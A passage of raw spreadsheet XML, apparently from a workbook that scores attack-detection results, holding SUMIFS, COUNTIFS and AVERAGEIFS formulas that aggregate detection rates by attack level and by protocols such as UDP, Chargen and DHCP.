        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH23" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI23" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ23" s="336"/>
      <c r="EK23" s="336"/>
      <c r="EL23" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP14&lt;&gt;0,'(B) - Detecciones - Ataques'!IP14*'(B) - Detecciones - Ataques'!IL14/('(B) - Detecciones - Ataques'!IL14+'(B) - Detecciones - Ataques'!IN14),0)</f>
        <v>0</v>
      </c>
      <c r="EM23" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP14&lt;&gt;0,'(B) - Detecciones - Ataques'!IP14*'(B) - Detecciones - Ataques'!IN14/('(B) - Detecciones - Ataques'!IL14+'(B) - Detecciones - Ataques'!IN14),0)</f>
        <v>1</v>
      </c>
      <c r="EN23" s="626"/>
      <c r="EO23" s="626"/>
      <c r="EP23" s="739"/>
      <c r="EQ23" s="735"/>
      <c r="ER23" s="740" t="s">
        <v>310</v>
      </c>
      <c r="ES23" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER23 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="ET23" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER23 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EU23" s="728">
        <f t="shared" si="16"/>
        <v>0.4</v>
      </c>
      <c r="EV23" s="735"/>
      <c r="EW23" s="741"/>
      <c r="EX23" s="735"/>
      <c r="EY23" s="735"/>
      <c r="EZ23" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="FA23" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ23)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ23 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ23 &amp; "*"))</f>
        <v>0.9997122716</v>
      </c>
      <c r="FB23" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ23)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ23 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ23 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="FC23" s="621"/>
      <c r="FD23" s="368"/>
      <c r="FE23" s="368"/>
      <c r="FF23" s="368"/>
      <c r="FG23" s="368"/>
      <c r="FH23" s="752" t="s">
        <v>226</v>
      </c>
      <c r="FI23" s="758">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!IQ3:IQ139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.6230699837</v>
      </c>
      <c r="FJ23" s="758">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!IR3:IR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.6721311475</v>
      </c>
      <c r="FK23" s="336"/>
      <c r="FL23" s="336"/>
      <c r="FM23" s="336"/>
      <c r="FN23" s="336"/>
      <c r="FO23" s="336"/>
      <c r="FP23" s="336"/>
      <c r="FQ23" s="368" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="FR23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ23)</f>
        <v>0.5</v>
      </c>
      <c r="FS23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ23)</f>
        <v>0.5</v>
      </c>
      <c r="FT23" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ23)</f>
        <v>1</v>
      </c>
      <c r="FU23" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ23)</f>
        <v>4</v>
      </c>
    </row>
    <row r="24">
      <c r="D24" s="288" t="s">
        <v>2597</v>
      </c>
      <c r="E24" s="290"/>
      <c r="DR24" s="580"/>
      <c r="DS24" s="580"/>
      <c r="DT24" s="580"/>
      <c r="DU24" s="580"/>
      <c r="DV24" s="580"/>
      <c r="DW24" s="580"/>
      <c r="DX24" s="580"/>
      <c r="DY24" s="580"/>
      <c r="DZ24" s="580"/>
      <c r="EA24" s="580"/>
      <c r="EE24" s="655" t="s">
        <v>310</v>
      </c>
      <c r="EF24" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG24" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH24" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI24" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ24" s="336"/>
      <c r="EK24" s="336"/>
      <c r="EL24" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP15&lt;&gt;0,'(B) - Detecciones - Ataques'!IP15*'(B) - Detecciones - Ataques'!IL15/('(B) - Detecciones - Ataques'!IL15+'(B) - Detecciones - Ataques'!IN15),0)</f>
        <v>0</v>
      </c>
      <c r="EM24" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP15&lt;&gt;0,'(B) - Detecciones - Ataques'!IP15*'(B) - Detecciones - Ataques'!IN15/('(B) - Detecciones - Ataques'!IL15+'(B) - Detecciones - Ataques'!IN15),0)</f>
        <v>0</v>
      </c>
      <c r="EN24" s="626"/>
      <c r="EO24" s="626"/>
      <c r="EP24" s="742"/>
      <c r="EQ24" s="743"/>
      <c r="ER24" s="740" t="s">
        <v>292</v>
      </c>
      <c r="ES24" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER24 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="ET24" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER24 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EU24" s="728">
        <f t="shared" si="16"/>
        <v>0.4</v>
      </c>
      <c r="EV24" s="759"/>
      <c r="EW24" s="760"/>
      <c r="EX24" s="743"/>
      <c r="EY24" s="743"/>
      <c r="EZ24" s="379" t="s">
        <v>951</v>
      </c>
      <c r="FA24" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ24)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ24 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ24 &amp; "*"))</f>
        <v>0.6333333333</v>
      </c>
      <c r="FB24" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ24)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ24 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ24)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ24 &amp; "*"))</f>
        <v>0.8</v>
      </c>
      <c r="FC24" s="621"/>
      <c r="FH24" s="752" t="s">
        <v>306</v>
      </c>
      <c r="FI24" s="758">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!IQ3:IQ139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.5527497194</v>
      </c>
      <c r="FJ24" s="758">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!IR3:IR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.7777777778</v>
      </c>
      <c r="FK24" s="336"/>
      <c r="FL24" s="336"/>
      <c r="FM24" s="336"/>
      <c r="FN24" s="336"/>
      <c r="FO24" s="336"/>
      <c r="FP24" s="336"/>
      <c r="FQ24" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"Chargen")</f>
        <v>Chargen</v>
      </c>
      <c r="FR24" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IP$3:$IP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ24)</f>
        <v>0</v>
      </c>
      <c r="FS24" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ24)</f>
        <v>0</v>
      </c>
      <c r="FT24" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ24)</f>
        <v>0</v>
      </c>
      <c r="FU24" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FQ24)</f>
        <v>1</v>
      </c>
    </row>
    <row r="25">
      <c r="D25" s="340" t="s">
        <v>2676</v>
      </c>
      <c r="E25" s="341" t="s">
        <v>2671</v>
      </c>
      <c r="DF25" s="662"/>
      <c r="DR25" s="592"/>
      <c r="DS25" s="592"/>
      <c r="DT25" s="592"/>
      <c r="DU25" s="592"/>
      <c r="DV25" s="592"/>
      <c r="DW25" s="592"/>
      <c r="EE25" s="655" t="s">
        <v>292</v>
      </c>
      <c r="EF25" s="69" t="str">
        <f>(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EG25" s="69" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EH25" s="336" t="str">
        <f>IF((COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))&lt;&gt;0,(SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EL$11:$EL$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")),"-")</f>
        <v>#VALUE!</v>
      </c>
      <c r="EI25" s="337" t="str">
        <f>(SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EM$11:$EM$148,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EE25,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EE25  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>#VALUE!</v>
      </c>
      <c r="EJ25" s="20"/>
      <c r="EK25" s="20"/>
      <c r="EL25" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP16&lt;&gt;0,'(B) - Detecciones - Ataques'!IP16*'(B) - Detecciones - Ataques'!IL16/('(B) - Detecciones - Ataques'!IL16+'(B) - Detecciones - Ataques'!IN16),0)</f>
        <v>0</v>
      </c>
      <c r="EM25" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP16&lt;&gt;0,'(B) - Detecciones - Ataques'!IP16*'(B) - Detecciones - Ataques'!IN16/('(B) - Detecciones - Ataques'!IL16+'(B) - Detecciones - Ataques'!IN16),0)</f>
        <v>0</v>
      </c>
      <c r="EN25" s="626"/>
      <c r="EO25" s="626"/>
      <c r="EP25" s="744"/>
      <c r="EQ25" s="745"/>
      <c r="ER25" s="761" t="s">
        <v>558</v>
      </c>
      <c r="ES25" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER25 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="ET25" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER25 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="EU25" s="728">
        <f t="shared" si="16"/>
        <v>0.75</v>
      </c>
      <c r="EV25" s="762"/>
      <c r="EW25" s="762"/>
      <c r="EX25" s="745"/>
      <c r="EY25" s="745"/>
      <c r="EZ25" s="379" t="s">
        <v>633</v>
      </c>
      <c r="FA25" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ25)+SUMIFS('(B) - Detecciones - Ataques'!$IQ$3:$IQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ25 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ25 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="FB25" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ25)+SUMIFS('(B) - Detecciones - Ataques'!$IR$3:$IR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ25 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EZ25)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EZ25 &amp; "*"))</f>
        <v>0.75</v>
      </c>
      <c r="FC25" s="621"/>
      <c r="FQ25" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"DHCP")</f>
        <v>DHCP</v>
      </c>
      <c r="FR25" s="336">
